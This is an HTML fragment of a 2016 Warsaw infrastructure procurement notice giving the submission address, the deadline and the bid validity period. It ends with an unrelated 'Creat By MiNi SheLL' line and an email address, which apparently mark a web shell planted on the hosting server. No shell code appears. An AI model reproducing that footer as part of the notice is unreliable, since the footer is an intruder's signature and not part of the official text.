Siedziba Zamawiającego: 
Stołeczny Zarząd Infrastruktury 
Al. Jerozolimskie 97 
00-909 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2016 godzina 09:30, miejsce: Siedziba Zamawiającego: 
Stołeczny Zarząd Infrastruktury 
Al. Jerozolimskie 97 
00-909 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com